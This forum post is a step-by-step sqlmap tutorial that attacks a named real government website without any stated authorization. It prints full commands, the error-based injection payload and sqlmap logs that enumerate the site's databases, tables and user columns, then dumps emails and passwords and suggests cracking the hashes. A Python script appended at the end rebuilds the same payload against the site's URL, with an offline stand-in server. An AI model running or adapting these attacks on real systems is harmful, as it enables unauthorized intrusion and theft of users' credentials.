Welcome to my thread

As I'm new here, my apologies for any mistakes in this first thread of mine.
Here I'll walk through how to do SQL injection (SQLi) with sqlmap, running on Backtrack 5 64-bit GNOME.
Before I start, for anyone who doesn't yet know what sqlmap is:
sqlmap is a tool written in Python that automates SQL injection. On Windows people usually use Havij instead, which is much simpler for launching SQLi (Windows means GUI), but the free version of Havij has a much thinner feature set.
OK, now you know. On to the main part.
For this lesson we'll use a government website as the example, http://jdih.lemsaneg.go.id/, exploiting a flaw in detail.php. The URL the post attacks is detail.php?m=perka/kepka&id=339, and sqlmap's output below identifies the injectable parameter as id, not m.
Know this first:
What I'm teaching here is illegal. This material is solely for educational purposes, and second or third parties are asked to understand that this is nothing more than a free AUDIT from me of the website http://jdih.lemsaneg.go.id/, before some hacker comes along and damages it. OK?
Step 1: test the injection by fetching the MySQL banner (the MySQL version)
Using the command
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 --banner

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:01:23

[20:01:23] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; en) Opera 9.27
[20:01:23] [INFO] using '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session' as session file
[20:01:23] [INFO] resuming injection data from session file
[20:01:23] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:01:23] [INFO] testing connection to the target url
[20:01:24] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=perka/kepka&id=339 AND (SELECT 1298 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),(SELECT (CASE WHEN (1298=1298) THEN 1 ELSE 0 END)),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

[20:01:24] [INFO] manual usage of GET payloads requires url encoding
[20:01:24] [INFO] the back-end DBMS is MySQL
[20:01:24] [INFO] fetching banner
[20:01:24] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': 5.0.45-community-nt
web server operating system: Windows
web application technology: PHP 5.2.4, Apache 2.2.6
back-end DBMS operating system: Windows
back-end DBMS: MySQL 5.0
banner: '5.0.45-community-nt'

[20:01:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id'

[*] shutting down at: 20:01:24
The banner fetch we just ran gives a positive result from the target: the DBMS is MySQL 5.0 (banner 5.0.45-community-nt), reached through an error-based injection in the id parameter. Note the "0 HTTP(s) requests": sqlmap found the injection point on an earlier run and is resuming it from its session file.
Step 2: fetch the database user in use and the current database, with the --current-user and --current-db flags
Using the command
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 --current-user --current-db

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:11:03

[20:11:03] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4pre) Gecko/2008101311 Firefox/3.0.4pre (Swiftfox)
[20:11:03] [INFO] using '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session' as session file
[20:11:03] [INFO] resuming injection data from session file
[20:11:03] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:11:03] [INFO] testing connection to the target url
[20:11:04] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=perka/kepka&id=339 AND (SELECT 1298 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),(SELECT (CASE WHEN (1298=1298) THEN 1 ELSE 0 END)),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

[20:11:04] [INFO] manual usage of GET payloads requires url encoding
[20:11:04] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.4, Apache 2.2.6
back-end DBMS: MySQL 5.0
[20:11:04] [INFO] fetching current user
[20:11:04] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': jdih@%
current user: 'jdih@%'
[20:11:04] [INFO] fetching current database
[20:11:04] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': jdihlsn
current database: 'jdihlsn'
[20:11:04] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id'

[*] shutting down at: 20:11:04
In step two we identified the DBMS account the website connects with (jdih@%) and the database it is currently using (jdihlsn).
Step 3: list the databases the user jdih@% can reach, with the --dbs flag
Using the command
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 --dbs

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:14:21

[20:14:21] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.9.2.8) Gecko/20100725 Gentoo Firefox/3.6.8
[20:14:21] [INFO] using '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session' as session file
[20:14:21] [INFO] resuming injection data from session file
[20:14:21] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:14:22] [INFO] testing connection to the target url
[20:14:23] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=perka/kepka&id=339 AND (SELECT 1298 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),(SELECT (CASE WHEN (1298=1298) THEN 1 ELSE 0 END)),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

[20:14:23] [INFO] manual usage of GET payloads requires url encoding
[20:14:23] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.4, Apache 2.2.6
back-end DBMS: MySQL 5.0
[20:14:23] [INFO] fetching database names
[20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': 8
[20:14:23] [INFO] the SQL query used returns 8 entries
[20:14:23] [INFO] starting 8 threads
[20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': webauth
[20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': test
[20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': phpmyadmin
[20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': mysql
[20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': jdihlsn_mybb
[20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': jdihlsn
[20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': cdcol
[20:14:23] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': information_schema
available databases [8]:
[*] cdcol
[*] information_schema
[*] jdihlsn
[*] jdihlsn_mybb
[*] mysql
[*] phpmyadmin
[*] test
[*] webauth

[20:14:23] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id'

[*] shutting down at: 20:14:23
So there are 8 databases available: cdcol, information_schema, jdihlsn, jdihlsn_mybb, mysql, phpmyadmin, test, and webauth. We'll go on with jdihlsn only; try the others yourself and see what you find.
Step 4: list the tables in the jdihlsn database with the flags -D jdihlsn --tables
With the command
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 -D jdihlsn --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:23:30

[20:23:30] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.2.11) Gecko/20101013 Ubuntu/10.10 (maverick) Firefox/3.6.10
[20:23:30] [INFO] using '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session' as session file
[20:23:30] [INFO] resuming injection data from session file
[20:23:30] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:23:31] [INFO] testing connection to the target url
[20:23:32] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=perka/kepka&id=339 AND (SELECT 1298 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),(SELECT (CASE WHEN (1298=1298) THEN 1 ELSE 0 END)),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

[20:23:32] [INFO] manual usage of GET payloads requires url encoding
[20:23:32] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.4, Apache 2.2.6
back-end DBMS: MySQL 5.0
[20:23:32] [INFO] fetching tables for database: jdihlsn
[20:23:32] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': 35
[20:23:32] [INFO] the SQL query used returns 35 entries
[20:23:32] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
[20:23:32] [INFO] starting 10 threads
Database: jdihlsn
[35 tables]
+-----------------------+
| attr_agenda           |
| attr_artikel          |
| attr_jurnal           |
| attr_kategori_artikel |
| attr_kategori_jurnal  |
| attr_link             |
| kd_xmlrpc_news        |
| lc_produk_hukum_cat   |
| lc_produk_hukum_map   |
| master_arsip          |
| master_document       |
| master_download       |
| master_fotter         |
| master_hukum          |
| master_kegiatan       |
| master_multiple_news  |
| master_news           |
| master_photo          |
| master_polling        |
| master_polling_option |
| master_polling_users  |
| master_profile        |
| mstr_profil           |
| online                |
| profile_visimisi      |
| rbca_arsip            |
| rbca_group            |
| rbca_module           |
| rbca_navigation       |
| rbca_rule             |
| rbca_users            |
| type_counter          |
| user_comment          |
| user_download         |
| user_profile          |
+-----------------------+

[20:23:32] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id'

[*] shutting down at: 20:23:32
Step 5: list the columns of a table with the --columns flag
First we list the columns of the table we care about, so that afterwards we only dump the columns that matter. The table here is rbca_users (the users table of the site's RBAC module), listed with -D jdihlsn -T rbca_users --columns.
Here is the command
./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 -D jdihlsn -T rbca_users --columns

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 20:59:14

[20:59:14] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
[20:59:14] [INFO] using '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session' as session file
[20:59:14] [INFO] resuming injection data from session file
[20:59:14] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[20:59:14] [INFO] testing connection to the target url
[20:59:15] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: m=perka/kepka&id=339 AND (SELECT 1298 FROM(SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),(SELECT (CASE WHEN (1298=1298) THEN 1 ELSE 0 END)),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---

[20:59:15] [INFO] manual usage of GET payloads requires url encoding
[20:59:15] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.2.4, Apache 2.2.6
back-end DBMS: MySQL 5.0
[20:59:15] [INFO] fetching columns for table 'rbca_users' on database 'jdihlsn'
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': 12
[20:59:15] [INFO] the SQL query used returns 12 entries
[20:59:15] [INFO] starting 10 threads
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': action
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(150)
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': browser
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(200)
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': ip
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(20)
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': last_login
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': datetime
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': login_time
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': datetime
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': online
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': smallint(1)
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': password
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(250)
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': email
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(100)
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': fullname
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': group_id
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': smallint(2)
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': activation
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': uid
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': int(11)
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': varchar(150)
[20:59:15] [INFO] read from file '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id/session': smallint(1)
Database: jdihlsn
Table: rbca_users
[12 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| action     | varchar(150) |
| activation | smallint(1)  |
| browser    | varchar(200) |
| email      | varchar(100) |
| fullname   | varchar(150) |
| group_id   | smallint(2)  |
| ip         | varchar(20)  |
| last_login | datetime     |
| login_time | datetime     |
| online     | smallint(1)  |
| password   | varchar(250) |
| uid        | int(11)      |
+------------+--------------+

[20:59:15] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/jdih.lemsaneg.go.id'

[*] shutting down at: 20:59:15
Now we fetch only the contents of the email and password columns, with the flags -D jdihlsn -T rbca_users -C email,password --dump. The --dump flag writes the column contents into sqlmap's output files, so we can look at them later from disk without running the injection again (logging).

./sqlmap.py -u "http://jdih.lemsaneg.go.id/detail.php?m=perka/kepka&id=339" --random-agent --threads 10 -D jdihlsn -T rbca_users -C email,password --dump

The results are logged under sqlmap's output folder for the target, which the runs above report as /pentest/database/sqlmap/output/jdih.lemsaneg.go.id.
And that's it.
All that's left is to "decrypt" the passwords; if they are stored as hashes, as is usual, that really means cracking them.
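As an added example that is not part of the original post: the following Python script reproduces by hand what sqlmap did in steps 1 to 5 through the injection point it reported, the id parameter of detail.php. It builds the same CONCAT/FLOOR(RAND(0)*2)/GROUP BY payload (with the ':dlr:' and ':siq:' markers that sqlmap wrote as CHAR(58,100,108,114,58) and CHAR(58,115,105,113,58)), URL-encodes it as sqlmap's log says a manual GET payload must be, and parses the leaked value out of MySQL's "Duplicate entry" error. It does not contact the real site: fake_target is a constructed stand-in that answers the way the post's logs show the server answered for the version, current user and current database; the rbca_users row it returns is a placeholder, not data from the site.

```python
# Added example (not from the original post): manual reproduction of the
# MySQL error-based technique sqlmap used against the `id` parameter.
import re
from typing import Callable, Dict, Optional
from urllib.parse import parse_qs, quote, urlencode, urlparse

# In the payload from sqlmap's log, CHAR(58,100,108,114,58) is ':dlr:' and
# CHAR(58,115,105,113,58) is ':siq:'. They bracket the leaked value so it
# can be picked out of the error message reliably.
PREFIX = ":dlr:"
SUFFIX = ":siq:"

TARGET = "http://jdih.lemsaneg.go.id/detail.php"   # endpoint from the post
BASE_PARAMS = {"m": "perka/kepka", "id": "339"}    # original query string


def build_payload(subquery: str) -> str:
    """Return the value to inject into `id` to leak one SQL expression.

    `subquery` yields a single value, e.g. "version()". CONCAT(...) glues
    the markers, the value and FLOOR(RAND(0)*2) into a GROUP BY key; with
    RAND(0) the key repeats, so MySQL fails with
    "Duplicate entry ':dlr:<value>:siq:1' for key 'group_key'",
    and the vulnerable page prints that error in its response body.
    """
    return (
        "339 AND (SELECT 1298 FROM("
        "SELECT COUNT(*),CONCAT(CHAR(58,100,108,114,58),"
        f"({subquery}),CHAR(58,115,105,113,58),FLOOR(RAND(0)*2))x "
        "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"
    )


def build_url(subquery: str) -> str:
    """Full GET URL; sqlmap's log notes manual GET payloads need URL encoding."""
    params = dict(BASE_PARAMS, id=build_payload(subquery))
    return TARGET + "?" + urlencode(params, safe="/", quote_via=quote)


# Non-greedy match between the markers; the trailing [01] is FLOOR(RAND(0)*2).
ERROR_RE = re.compile(
    r"Duplicate entry '" + re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX)
    + r"[01]' for key"
)


def extract_value(response_body: str) -> Optional[str]:
    """Pull the leaked value out of the MySQL error echoed in the HTML."""
    m = ERROR_RE.search(response_body)
    return m.group(1) if m else None


# Constructed stand-in for the vulnerable server, so this runs offline.
# version()/current_user()/database() are the values the post's sqlmap logs
# report; the rbca_users row is a placeholder (md5 of "password"), NOT data
# taken from the site.
FAKE_DB: Dict[str, str] = {
    "version()": "5.0.45-community-nt",
    "current_user()": "jdih@%",
    "database()": "jdihlsn",
    "SELECT CONCAT(email,0x3a,password) FROM jdihlsn.rbca_users LIMIT 0,1":
        "admin@example.invalid:5f4dcc3b5aa765d61d8327deb882cf99",
}


def fake_target(url: str) -> str:
    """Answer like the real detail.php did: echo the MySQL error on a dup key."""
    injected = parse_qs(urlparse(url).query)["id"][0]
    for subquery, value in FAKE_DB.items():
        if f"({subquery})" in injected:
            return (f"<html><body>Duplicate entry '{PREFIX}{value}{SUFFIX}1' "
                    "for key 'group_key'</body></html>")
    return "<html><body>normal detail page</body></html>"


def leak(subquery: str, fetch: Callable[[str], str] = fake_target) -> Optional[str]:
    """One round trip: build the URL, fetch the page, parse the error."""
    return extract_value(fetch(build_url(subquery)))


def run_walkthrough(fetch: Callable[[str], str] = fake_target) -> Dict[str, Optional[str]]:
    """Replay the post's steps: banner, current user, current DB, one dumped row."""
    return {
        "banner": leak("version()", fetch),
        "current_user": leak("current_user()", fetch),
        "current_db": leak("database()", fetch),
        "rbca_users_row": leak(
            "SELECT CONCAT(email,0x3a,password) FROM jdihlsn.rbca_users LIMIT 0,1",
            fetch),
    }


if __name__ == "__main__":
    for name, value in run_walkthrough().items():
        print(f"{name}: {value}")
```

Two things the script makes visible that sqlmap hides: every leaked value costs one request, and the "Duplicate entry" error truncates long keys, so anything longer than the error message carries has to be pulled in slices with MID(); sqlmap does that chunking (and the LIMIT stepping through rows) for you, which is also why --threads 10 means ten of these requests in flight at once against the target during a live run.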
Remember!
For educational purposes only!